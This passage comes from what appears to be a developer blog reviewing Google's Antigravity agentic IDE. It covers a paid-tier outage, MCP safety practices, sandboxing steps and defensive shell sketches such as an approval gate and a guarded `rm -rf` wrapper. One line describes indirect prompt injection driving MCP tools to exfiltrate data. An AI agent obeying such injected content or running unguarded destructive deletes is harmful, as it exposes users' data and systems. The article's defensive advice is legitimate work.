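import os


def snapshot(root: str) -> dict:
    """Map each file's path (relative to root) to (size, mtime_ns)."""
    state = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                info = os.stat(full)
            except OSError:
                continue  # file vanished mid-scan
            state[os.path.relpath(full, root)] = (info.st_size, info.st_mtime_ns)
    return state


def diff(before: dict, after: dict) -> dict:
    """List files deleted, added, or changed between two snapshots."""
    return {
        "deleted": sorted(before.keys() - after.keys()),
        "added": sorted(after.keys() - before.keys()),
        "changed": sorted(
            path for path in before.keys() & after.keys()
            if before[path] != after[path]
        ),
    }
```

Run `snapshot` on the mounted project directory before starting the agent and again after it finishes; a non-empty `deleted` list that you did not ask for is the signal to stop and restore from backup.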

Better recommendation: Use Cursor, Kiro, or Windsurf for production work. They have the safety guardrails Antigravity lacks.

Sources: The Register, Tom’s Hardware, Newsweek

The “Agent Terminated Due to Error” Crisis: Widespread Reliability Issues

What is the “Agent terminated due to error” issue in Antigravity? Starting January 14-15, 2026, Antigravity users (especially paid Ultra and Pro subscribers) began experiencing persistent “Agent execution terminated due to error” failures. The agent fails immediately upon generation regardless of prompt complexity, model choice, or troubleshooting steps. Free accounts continue working normally.

Incident Timeline and Scope

When it started: January 14, 2026 (evening) - ongoing as of January 22, 2026

Who’s affected: Primarily Google AI Ultra and Pro subscribers (paid tiers). Free accounts work normally.

Geographic spread: Global (reported from US, Europe, Asia)

Severity: Total blocker - users cannot generate code or run any agent tasks

Reported Symptoms

Primary error message:

Agent terminated due to error

You can prompt the model to try again or start a new conversation if the error persists.

See our troubleshooting guide for more help.

Secondary error (widespread):

One moment, the agent is currently loading...

[Stuck indefinitely - never loads]

Console log errors (from affected users):

- `Cache(userInfo): Singleflight refresh failed: You are not logged into Antigravity.` (authentication failure despite successful login)

- `429 Too Many Requests` (rate limiting on paid accounts while free accounts work)

- `API requests are being rejected` (backend rejection without clear reason)

- `ConnectError: [unknown] reactive component not found` (agent loading failure after 200+ retry attempts)

Affected models: All models (Gemini 3 Pro/Flash, Claude 4.5 Opus/Sonnet) fail equally

Affected platforms: Windows, Mac, Linux (cross-platform reliability issues)

The Paradox: Paid Accounts Broken, Free Accounts Work

What makes this particularly frustrating: Users paying $20-40/month for Ultra/Pro plans cannot use Antigravity, while free accounts on the same machine work perfectly.

User reports from Google AI Forum (January 15, 2026):

- “Ultra plan here. Having that issue for 5 hours already” - Sergei_Telitsyn

- “Pro plan here. Not working at all, 0 agents working. Man… we are paying for nothing.” - Jaime_Caceres

- “This is pretty annoying since I paid for this, while free accounts work.” - Bit_dynamo

- “It’s a little frustrating that you have to pay extra for an Ultra Abo just for Antigravity, and now it’s not working for hours, while it works fine with a free account.” - StevenX

User reports from Google AI Forum (December 30, 2025 - January 10, 2026):

- “Stuck with loading agent. It has been a consistent failure every day. DEFINITELY NOT WORTH $$ – I use copilot at work. Smooth.” - diamondh (paid subscriber)

- “I’ve worked more on trying to troubleshoot Antigravity than work on my project. Sad really. I have restarted, reinstalled, re-everything. Nothing works.” - diamondh

- “I’ve been facing this issue for the past 8 hours.” - Santhosh_Ampolu (with screenshot)

- “Been stuck on this for ages on my Mac.” - Connor_Campbell (with screenshot)

- “Facing same issue. Tried reinstalling, logout login again. Nothing worked.” - kevin_shah (with screenshot)

Troubleshooting Steps That Don’t Work

Users have attempted extensive troubleshooting with zero success:

Authentication & Account:

- ✗ Logged out and re-authenticated

- ✗ Revoked and reconnected Google Antigravity permissions

- ✗ Tested in incognito/private browsing mode

- ✗ Tried different Google accounts (paid accounts fail, free accounts work)

Application & System:

- ✗ Restarted Antigravity application

- ✗ Restarted physical machine

- ✗ Reinstalled Antigravity completely

- ✗ Cleared browser cache, cookies, and site data

- ✗ Manually cleared/renamed local config folder

Configuration:

- ✗ Switched between models (all fail equally)

- ✗ Disabled all MCP servers

- ✗ Tried completely fresh projects in new folders

- ✗ Reset Antigravity preferences in Google account

- ✗ Fixed Windows folder permissions and added exclusions

Nothing works. This is a backend/infrastructure issue, not a client-side problem.

Root Cause Analysis (Based on User Reports)

Most likely cause: Backend authentication or rate limiting bug affecting paid tier accounts specifically.

Evidence:

- Authentication token failure: Console logs show “You are not logged into Antigravity” despite successful login

- Rate limiting on paid accounts: `429 Too Many Requests` errors on Pro accounts while free accounts work

- Account-specific: Same machine, same installation, different accounts = different results

- Tier-specific: Paid tiers (Ultra, Pro) fail; free tier works

Hypothesis: Google’s backend is incorrectly applying rate limits or authentication checks to paid accounts, possibly due to:

- Quota system misconfiguration (paid accounts hitting limits that shouldn’t exist)

- Authentication token generation failure for paid tiers

- Backend service degradation affecting paid tier infrastructure specifically

Google’s Response

Official acknowledgment: Google AI Forum moderator stated “We have identified this as a bug and escalated it internally” (January 15, 2026)

Resolution timeline: Not provided

Workaround: None (switching to free account defeats the purpose of paying)

What This Reveals About Antigravity’s Maturity

This incident exposes critical production readiness gaps:

- No service status page: Users have no visibility into outages or incidents

- No SLA (Service Level Agreement): Paid subscribers have no guaranteed uptime

- No incident communication: Users learn about issues from each other on forums, not from Google

- No rollback capability: When backend changes break paid tiers, there’s no quick rollback

- Inadequate testing: Backend changes weren’t tested against paid tier accounts before deployment

Comparison to production-ready services:

| Feature | Antigravity | Cursor | GitHub Copilot |
|---|---|---|---|
| Service Status Page | ❌ None | ✅ status.cursor.com | ✅ githubstatus.com |
| SLA for Paid Tiers | ❌ None | ✅ 99.9% uptime | ✅ 99.9% uptime |
| Incident Communication | ❌ Forum posts only | ✅ Email + status page | ✅ Email + status page |
| Rollback Capability | ❌ Unknown | ✅ Yes | ✅ Yes |
| Compensation for Outages | ❌ Not mentioned | ✅ Service credits | ✅ Service credits |

Recommendations

If you’re a paid Antigravity subscriber:

- Document downtime: Track hours of unavailability for potential refund requests

- Have a backup IDE: Keep Cursor or Windsurf installed for when Antigravity fails

- Don’t rely on Antigravity for critical work: Until reliability improves, treat it as experimental
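
For the "document downtime" item, a plain CSV log is enough. Here is a minimal sketch, assuming you note the start and end of each outage as Unix timestamps. The file name and the function names `record_outage` and `total_downtime_hours` are my own placeholders, not anything Antigravity provides.

```shell
#!/bin/sh
# Hypothetical outage log: one CSV row per outage (start_epoch,end_epoch,note).
OUTAGE_LOG="${OUTAGE_LOG:-./antigravity-outages.csv}"

# record_outage START_EPOCH END_EPOCH NOTE
# Appends one outage to the log. Get timestamps with: date +%s
record_outage() {
    printf '%s,%s,%s\n' "$1" "$2" "$3" >> "$OUTAGE_LOG"
}

# total_downtime_hours
# Sums (end - start) over every row and prints the total in hours.
total_downtime_hours() {
    awk -F, '{ total += ($2 - $1) } END { printf "%.1f\n", total / 3600 }' "$OUTAGE_LOG"
}
```

Attach the log, along with screenshots of the error, to any refund request so the claimed hours can be checked against forum reports.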

If you’re evaluating Antigravity:

- Wait for stability: Combined security and reliability issues show Antigravity is not production-ready

- Choose proven alternatives: Cursor (360,000+ paying customers, established reliability) or Windsurf (mature, stable)

- Monitor Google’s response: If Google provides SLAs, status pages, and incident communication, reconsider later

The bottom line: Paying for a service that works worse than the free tier is unacceptable. This incident, combined with security vulnerabilities and catastrophic failures, confirms Antigravity is experimental software that should not be used for professional work.

Sources: Google AI Forum - Antigravity broken, Google AI Forum - Ultra plan issue, Google AI Forum - Bug escalation, Google AI Forum - Stuck at loading agent

MCP: The Hidden Multiplier (When It’s Safe)

All of these tools get better with the Model Context Protocol (MCP).

What MCP does: Connects AI agents to external systems (databases, GitHub, design tools, APIs) so they can query real data instead of guessing.

Antigravity’s MCP implementation: Supports MCP store and configurable server connections, but lacks human-in-the-loop controls. This makes it powerful but dangerous.

The security issue: Without approval gates, indirect prompt injection attacks can invoke any MCP tool to exfiltrate data or modify external systems.

Safe MCP usage patterns:

- Start minimal: Connect 1-2 servers (GitHub + database) and add more only when you have a repeatable use case

- Read-only first: Prefer read-only MCP tools until you understand the risk profile

- Human approval for destructive operations: Any MCP tool that can modify or delete data should require explicit approval

- Audit logs: Track what MCP tools are invoked and what data they access
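
The last two patterns can be prototyped without any IDE support. Here is a minimal sketch of an approval gate with an audit log, written as a POSIX shell function that a wrapper script could call before forwarding a tool call. The tool names (`github.list_issues`, `db.select`, and so on), the allowlist, and the log path are hypothetical. Real MCP servers name their tools differently, and this is not how any of the IDEs in this article implement approvals.

```shell
#!/bin/sh
# Hypothetical approval gate for MCP tool calls. Tool names, the allowlist,
# and the log path are illustrative assumptions, not any IDE's real API.
MCP_AUDIT_LOG="${MCP_AUDIT_LOG:-./mcp-audit.log}"

# Read-only tools that may run without asking (assumed names).
MCP_READ_ONLY_TOOLS="github.list_issues github.get_file db.select"

# mcp_gate TOOL
# Returns 0 if the call may proceed, 1 if it must be blocked.
# Anything not on the read-only allowlist needs a "y" typed on stdin.
mcp_gate() {
    gate_tool="$1"
    gate_decision="denied"

    case " $MCP_READ_ONLY_TOOLS " in
        *" $gate_tool "*)
            gate_decision="allowed-read-only"
            ;;
        *)
            printf 'Tool "%s" can modify data. Approve? [y/N] ' "$gate_tool" >&2
            gate_answer=""
            read -r gate_answer || gate_answer=""
            if [ "$gate_answer" = "y" ]; then
                gate_decision="approved-by-human"
            fi
            ;;
    esac

    # Audit log: UTC timestamp, tool name, decision (tab-separated).
    printf '%s\t%s\t%s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" \
        "$gate_tool" "$gate_decision" >> "$MCP_AUDIT_LOG"

    [ "$gate_decision" != "denied" ]
}
```

The default is deny: an unknown tool, an empty answer, or a closed stdin all block the call, and every decision lands in the log whether or not it was approved.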

Current state by IDE:

- Cursor: MCP support with reasonable safety defaults

- Kiro: MCP support with spec-driven workflows that add review checkpoints

- Windsurf: MCP support with mature safety patterns

- Antigravity: MCP support with no human-in-the-loop controls (unsafe)

If you have not used MCP yet, read the official introduction: What is MCP?

If your work touches UI and accessibility, do not skip verification - use a checklist like in my accessibility guide for design engineers.

Practical Next Steps: How to Evaluate Safely

If you want to try Antigravity despite the risks:

Step 1: Set Up a Sandboxed Environment (Required)

Option A: Virtual Machine (Recommended)

# Using VirtualBox or VMware

1. Create new VM (Ubuntu 22.04 or Windows 11)

2. Allocate 8GB RAM, 50GB disk

3. Install Antigravity inside VM only

4. Do NOT mount host directories

5. Use VM snapshots before each session

Option B: Docker Container (Advanced)

# Isolate Antigravity in a container.
# --network none disables network access; the :ro suffix makes the mount read-only.

docker run -it --rm \
  --name antigravity-sandbox \
  --network none \
  -v /path/to/test-code:/workspace:ro \
  ubuntu:22.04

Option C: Separate Machine (Safest)

- Use old laptop or spare desktop

- No access to production networks

- Wipe and reinstall OS after testing
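
If you go with Option A on VirtualBox, the "snapshot before each session" step is easy to script. Here is a minimal sketch, assuming a VM named `antigravity-sandbox`. The VM name, the snapshot naming scheme, and the `DRY_RUN` switch are my own conventions. `VBoxManage snapshot ... take` and `restore` are the VirtualBox CLI subcommands; VMware needs different tooling.

```shell
#!/bin/sh
# VM_NAME and the "pre-session-<timestamp>" naming scheme are assumptions.
VM_NAME="${VM_NAME:-antigravity-sandbox}"

# run_or_print CMD [ARGS...]
# With DRY_RUN=1, print the command instead of running it.
run_or_print() {
    if [ "${DRY_RUN:-0}" = "1" ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# Take a timestamped snapshot before starting an Antigravity session.
take_pre_session_snapshot() {
    run_or_print VBoxManage snapshot "$VM_NAME" take \
        "pre-session-$(date +%Y%m%d-%H%M%S)"
}

# restore_snapshot NAME
# Roll the VM back to a snapshot (power the VM off first).
restore_snapshot() {
    run_or_print VBoxManage snapshot "$VM_NAME" restore "$1"
}
```

Run `DRY_RUN=1 take_pre_session_snapshot` once to see the exact command before letting the script touch the VM.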

Step 2: Test with Non-Critical Data

Safe test projects:

- ✅ Tutorial code from online courses

- ✅ Open source examples (cloned, not forked)

- ✅ Throwaway prototypes with no business value

- ✅ Generated test data (no real names, emails, API keys)

Never test with:

- ❌ Production code or customer data

- ❌ Proprietary algorithms or trade secrets

- ❌ Files containing API keys, credentials, tokens

- ❌ Personal documents, photos, or backups

Step 3: Evaluate the Orchestration Patterns

Test these Antigravity-specific features:

- Agent Manager: Run 2-3 agents in parallel across different workspaces

- Browser subagent: Verify a simple UI change (button color, form validation)

- Artifacts: Review diffs, diagrams, and screenshots generated

Compare with production-ready alternatives:

- Run the same task in Cursor (Composer mode)

- Run the same task in Windsurf (Cascade mode)

- Measure: speed, accuracy, safety, and your stress level

Step 4: Document Your Findings

Track these metrics:

- Time to complete task (Antigravity vs Cursor vs Windsurf)

- Number of errors encountered

- Number of manual interventions required

- Stress level (1-10): How worried were you about data loss?

Decision criteria:

- If Antigravity is 2x faster but you’re constantly worried → Not worth it

- If Cursor is 20% slower but you sleep well → Use Cursor

- If Windsurf is the same speed and more stable → Use Windsurf
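
To compare tools on the same numbers, log each trial as one CSV row and summarize per tool. Here is a minimal sketch, assuming a header-less file with the columns `tool,seconds,errors,interventions,stress`. The column layout and the function name `summarize_trials` are my own choices for illustration.

```shell
#!/bin/sh
# summarize_trials FILE
# FILE is CSV without a header: tool,seconds,errors,interventions,stress
# Prints one line per tool: average time, total errors, total manual
# interventions, and average stress level.
summarize_trials() {
    awk -F, '
        {
            n[$1]++
            secs[$1] += $2
            errs[$1] += $3
            ints[$1] += $4
            stress[$1] += $5
        }
        END {
            for (t in n)
                printf "%s avg_seconds=%.0f errors=%d interventions=%d avg_stress=%.1f\n",
                    t, secs[t] / n[t], errs[t], ints[t], stress[t] / n[t]
        }
    ' "$1" | sort
}
```

Read the speed and stress columns together: a tool that halves `avg_seconds` while pushing `avg_stress` toward 10 fails the first decision criterion above.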

The Realistic Recommendation for Most Developers

For 95% of developers:

Use Cursor for production work and daily development:

- ✅ SOC 2 Type II certified

- ✅ 360,000+ paying customers (proven at scale)

- ✅ Zero data loss incidents

- ✅ Transparent pricing ($20/mo Pro)

- ✅ Excellent semantic search

- ✅ Mature rules system (.cursorrules, AGENTS.md)

When to consider alternatives:

- Use Kiro when you need spec-driven development with strong change management and auditability (regulated industries, high-risk changes)

- Use Windsurf when you want a mature IDE-native experience with Cascade agentic mode and fast iteration

- Use OpenCode when privacy and data sovereignty are critical requirements (self-hosted, no data storage, audit-friendly)

Only use Antigravity for sandboxed experiments where you specifically need to test agent orchestration patterns, and only with:

- ✅ VM or container isolation

- ✅ Non-sensitive data

- ✅ Complete backups

- ✅ Acceptance of “Agent terminated” errors

- ✅ No deadlines or client work

Wait for these before reconsidering Antigravity for production:

- ✅ All critical security vulnerabilities patched and verified by independent researchers

- ✅ “Agent terminated” crisis resolved for paid subscribers

- ✅ Service status page and SLA published

- ✅ Confirmation gates added for destructive operations

- ✅ Path validation implemented (block drive roots)

- ✅ At least 6 months of stable operation with no major incidents
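
To make the "confirmation gates" and "path validation" items concrete, here is a minimal sketch of the kind of guard I mean, written as a wrapper around recursive delete. It is my own illustration, not Google's code or a description of any planned fix, and the function names `is_drive_root` and `safe_delete` are hypothetical.

```shell
#!/bin/sh
# is_drive_root PATH
# Succeeds when PATH is empty, the POSIX root, or a Windows drive root
# such as D:, D:/ or D:\.
is_drive_root() {
    case "$1" in
        ""|/|//) return 0 ;;
        [A-Za-z]:|[A-Za-z]:/|[A-Za-z]:\\) return 0 ;;
    esac
    return 1
}

# safe_delete PATH
# Path validation first, then a confirmation gate: the user must retype
# the exact path on stdin before anything is removed.
# Returns 2 when the path is refused, 1 when the user does not confirm.
safe_delete() {
    target="$1"
    if is_drive_root "$target"; then
        echo "refused: '$target' is a drive or filesystem root" >&2
        return 2
    fi

    printf 'Delete "%s" recursively? Retype the path to confirm: ' "$target" >&2
    confirm=""
    read -r confirm || confirm=""
    if [ "$confirm" != "$target" ]; then
        echo "cancelled: confirmation did not match" >&2
        return 1
    fi

    rm -rf -- "$target"
}
```

This sketch only matches literal root paths. It does not resolve symlinks or `..` segments, which a real implementation would need to handle before trusting the check.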

Current status (January 22, 2026): None of the above conditions are met. Antigravity remains experimental software unsuitable for professional use.

Related Resources

- AI-Augmented Development: The Complete Guide - A broader comparison of the 2026 tool landscape with safety considerations.

- React Performance: 4-Step Optimization Framework - Make agents prove performance gains with measurable verification.

- Accessibility for Design Engineers - Verification checklists that prevent “AI shipped it” regressions.

- TypeScript Patterns for React Developers - Strong types make agent output more reliable and reviewable.

January 22, 2026 (Current)

- ✅ Article published with comprehensive security analysis

- ⚠️ Critical security vulnerabilities remain unpatched (no timeline from Google)

- ⚠️ “Agent terminated” crisis ongoing for paid subscribers (8+ days)

- ⚠️ NEW: Claude Opus 4.5 quotas cut by ~60% (1 hour use → 4-7 day lockout)

- ⚠️ No service status page or SLA from Google

- ⚠️ No documentation of quota limits or reset periods

When to reconsider Antigravity:

- ✅ All critical vulnerabilities patched and verified

- ✅ 6+ months of stable operation

- ✅ Service status page and SLA

- ✅ Zero catastrophic failures in that period

Pro tip: Set up Google Alerts for “Antigravity CVE” and “Antigravity security patch” to get notified when vulnerabilities are patched.

The Bottom Line

Antigravity introduces genuinely innovative ideas around agent orchestration, browser automation, and artifact-based workflows. These patterns will likely influence the next generation of agentic IDEs.

However, critical security vulnerabilities, catastrophic failure modes, and widespread reliability issues make it unsuitable for production work. The combination of:

- Multiple critical security vulnerabilities with working exploits (RCE, data exfiltration, no HITL for MCP)

- Confirmed catastrophic failures (data loss incidents)

- Ongoing reliability crisis (paid subscribers unable to use the service for 8+ days)

…confirms that Antigravity is experimental software that should not be used for professional development.

For production work: Use Cursor (SOC 2 certified, 360,000+ paying customers, proven stability) or Windsurf (mature, production-ready).

For spec-driven development: Use Kiro when clarity and auditability matter more than experimental features.

For open source transparency: Use OpenCode when privacy and data sovereignty are critical requirements.

For experimental prototyping only: Use Antigravity in sandboxed environments with non-sensitive data, and only after understanding the security risks and accepting potential data loss.

The future of agentic IDEs is promising, but safety must come first. Speed without guardrails doesn’t ship features faster—it ships disasters faster.

When Antigravity is ready for production, I’ll update this article. Until then, choose tools that won’t delete your drive or leak your API keys.